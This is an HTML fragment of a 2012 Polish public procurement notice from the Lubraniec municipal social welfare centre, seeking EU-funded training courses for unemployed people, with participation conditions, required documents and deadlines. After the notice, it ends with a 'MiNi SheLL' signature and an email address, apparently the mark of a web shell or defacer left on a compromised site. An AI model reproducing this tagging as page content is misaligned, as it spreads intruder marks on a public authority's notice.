<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wadium w tym postępowaniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 1 ustawy Pzp, Zamawiający żąda:
-oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 2 ustawy Pzp, Zamawiający żąda:
- wykazania, że Wykonawca wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przynajmniej dwie usługi szkoleniowe składające się z treningu kompetencji społecznych i kursów zawodowych dla co najmniej 20 osób bezrobotnych, wg wzoru, stanowiącego załącznik do niniejszej siwz.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda:
- -oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 3 ustawy Pzp, Zamawiający żąda:
      -  wykazania, że Wykonawca dysponuje kadrą szkoleniową tj. co najmniej jedną osobą (będącą   
            wykładowcą, trenerem lub instruktorem), która posiada odpowiednie kwalifikacje zawodowe,  
            doświadczenie i wykształcenie w dziedzinie, z której prowadzi zajęcia; przy czym przez doświadczenie  
            zawodowe rozumie się przynajmniej jeden rok stażu zawodowego na stanowisku odpowiednim do  
            prowadzenia zajęć z określonej dziedziny (tematyki szkolenia/kursu/ warsztatów)
wraz z oświadczeniem potwierdzającym, że wskazane osoby posiadają wymagane przepisami uprawnienia do prowadzenia szkoleń, będących przedmiotem zamówienia, wg wzoru, stanowiącego załącznik nr 6do niniejszej siwz</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia Wykonawcy w okolicznościach, o których mowa w art. 22 ust. 1 pkt 4 ustawy Pzp, Zamawiający żąda oświadczenia o braku podstaw do wykluczenia Wykonawcy z postępowania, zgodnie ze wzorem oświadczenia stanowiącym Załącznik do niniejszej SIWZ (w przypadku wspólnego ubiegania się o udzielenie zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie - 50</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.lubraniec.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejsko - Gminny Ośrodek Pomocy Społecznej
 ulica Brzeska 49
87-890 Lubraniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.06.2012 godzina 16:00, miejsce: Miejsko - Gminny Ośrodek Pomocy Społecznej
ulica Brzeska 49
87-890 Lubraniec.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego w ramach Priorytetu VII Promocja integracji społecznej, Działania 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałania 7.1.1 Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com